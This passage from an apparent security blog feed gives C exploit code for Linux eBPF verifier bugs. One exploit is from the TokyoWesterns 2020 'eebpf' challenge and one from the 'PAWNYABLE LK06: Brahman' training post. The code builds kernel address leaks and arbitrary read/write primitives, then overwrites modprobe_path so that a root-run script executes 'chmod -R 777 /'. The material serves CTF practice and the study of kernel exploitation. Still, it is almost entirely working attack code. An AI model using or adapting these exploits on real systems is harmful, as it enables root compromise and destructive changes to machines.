          0x08),  // r1 = r1 &amp;amp; 0x08 == (.val=0, .mask=0x8; umin=0, umax=0x8)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0,
                    BPF_REG_1),  // r0 =  r0 + r1 == (umin=0x8, umax=0x8) ==
                                 // constant 8 (but, it&amp;#39;s actually 0x10)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_0,
          -0x8),  // r0 = r0 - 0x8 == constant 0 (but, it&amp;#39;s actually 0x8)
      BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),  // r7 = r0
      // From now, r7 is marked as constant 0 but it&amp;#39;s actually 0x08

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_7),  // arg4 = r7 == (actual_val=0x8; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    1),  // arg4 = 1 * arg4 == (actual_val=0x8; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          8),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x8, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x8, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s&amp;#34;, verifier_log);
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}
static uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x8),

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // map_lookup_elem(mapfd, &amp;amp;key)
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_MOV64_REG(BPF_REG_5, BPF_REG_0),           // r5 = map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0),  // r6 = *map_elem == 1

      BPF_MOV64_REG(
          BPF_REG_0,
          BPF_REG_6),  // r0 = r6 == (.val=0, .mask=0xffffffffffffffff)
      BPF_MOV64_IMM(BPF_REG_1, -1),  // r1 = 0xffffffffffffffff
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    3),  // r1 = r1 &amp;gt;&amp;gt; 3 == 0x1fffffffffffffff
      BPF_ALU64_REG(BPF_AND, BPF_REG_0,
                    BPF_REG_1),  // r0 = r0 &amp;amp; r1 == (actual_val=1; .val=0,
                                 // .mask=0x1fffffffffffffff)
      BPF_ALU64_IMM(BPF_ALSH, BPF_REG_0,
                    3),  // r0 = r0 &amp;lt;&amp;lt; 3 == (actual_val=8; .val=0,
                         // .mask=0xfffffffffffffff8;
                         // umin=0, umax=0xfffffffffffffff8)
      BPF_ALU64_IMM(
          BPF_REG_0, BPF_ADD,
          8),  // r0 = r0 + 8 == (actual_val=0x10; .val=0, .mask=0x8; umin=0x8,
               // umax=0).
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),  // r1 = r6 == [map_elem]
      BPF_ALU64_IMM(
          BPF_AND, BPF_REG_1,
          0x08),  // r1 = r1 &amp;amp; 0x08 == (.val=0, .mask=0x8; umin=0, umax=0x8)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0,
                    BPF_REG_1),  // r0 =  r0 + r1 == (umin=0x8, umax=0x8) ==
                                 // constant 8 (but, it&amp;#39;s actually 0x10)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_0,
          -0x8),  // r0 = r0 - 0x8 == constant 0 (but, it&amp;#39;s actually 0x8)
      BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),  // r7 = r0
      // From now, r7 is marked as constant 0 but it&amp;#39;s actually 0x08

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_7),  // arg4 = r7 == (actual_val=0x8; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    1),  // arg4 = 1 * arg4 == (actual_val=0x8; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          8),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x8, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x8, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s&amp;#34;, verifier_log);
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));

  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

int main() {
  mapfd = bpf_map_create(sizeof(uint64_t), 1);
  map_addr = leak_bpf_map_addr(0);
  printf(&amp;#34;[+] map_addr = 0x%016lx\n&amp;#34;, map_addr);

  uint64_t kernel_base = aar64(map_addr) - BPF_MAP_OPS_OFFSET;
  printf(&amp;#34;[+] kernel_base: 0x%016lx\n&amp;#34;, kernel_base);

  const char* new_modprobe = &amp;#34;/tmp/evil.sh&amp;#34;;
  const size_t new_modprobe_len = strlen(new_modprobe);
  printf(&amp;#34;[*] Overwrite modprobe to %s\n&amp;#34;, new_modprobe);
  for (size_t i = 0; i &amp;lt; new_modprobe_len; i += 8) {
    aaw64(kernel_base + MODPROBE_OFFSET + i, *(uint64_t*)(new_modprobe + i));
  }
  {
    int fd = open(&amp;#34;/proc/sys/kernel/modprobe&amp;#34;, O_RDONLY);
    if (fd &amp;lt; 0) {
      fatal(&amp;#34;open(/proc/sys/kernel/modprobe)&amp;#34;);
    }

    char modprobe[0x100];
    read(fd, modprobe, sizeof(modprobe));
    if (strncmp(modprobe, new_modprobe, new_modprobe_len)) {
      printf(&amp;#34;[*] new modprobe: %s\n&amp;#34;, modprobe);
      puts(&amp;#34;[-] Failed to overwrite modprobe&amp;#34;);
      return -1;
    }
    puts(&amp;#34;[+] Successfully overwritten modprobe&amp;#34;);
  }

  puts(&amp;#34;[+] Get root&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;#!/bin/sh\nchmod -R 777 /&amp;#39; &amp;gt; /tmp/evil.sh&amp;#34;);
  system(&amp;#34;chmod +x /tmp/evil.sh&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;\xde\xad\xbe\xef&amp;#39; &amp;gt; /tmp/pwn&amp;#34;);
  system(&amp;#34;chmod +x /tmp/pwn&amp;#34;);
  system(&amp;#34;/tmp/pwn&amp;#34;);

  close(mapfd);
  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h2 id=&#34;reference&#34;&gt;Reference&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/TokyoWesterns/2020/eebpf&#34;&gt;https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/TokyoWesterns/2020/eebpf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
    </item>
    
    <item>
      <title>PAWNYABLE LK06: Brahman</title>
      <link>/posts/kernel/pawnyable/pawnyable_lk06/</link>
      <pubDate>Wed, 22 Jan 2025 12:31:57 +0000</pubDate>
      
      <guid>/posts/kernel/pawnyable/pawnyable_lk06/</guid>
      <description>&lt;hr&gt;
&lt;h2 id=&#34;lk06-brahman&#34;&gt;LK06: Brahman&lt;/h2&gt;
&lt;h3 id=&#34;exploit-using-adjust_ptr_min_max_vals&#34;&gt;Exploit using adjust_ptr_min_max_vals&lt;/h3&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;149628537&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;149628537&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;exploit.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handle the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&amp;amp;val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  write(socks[1], &amp;#34;Hello&amp;#34;, 5);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
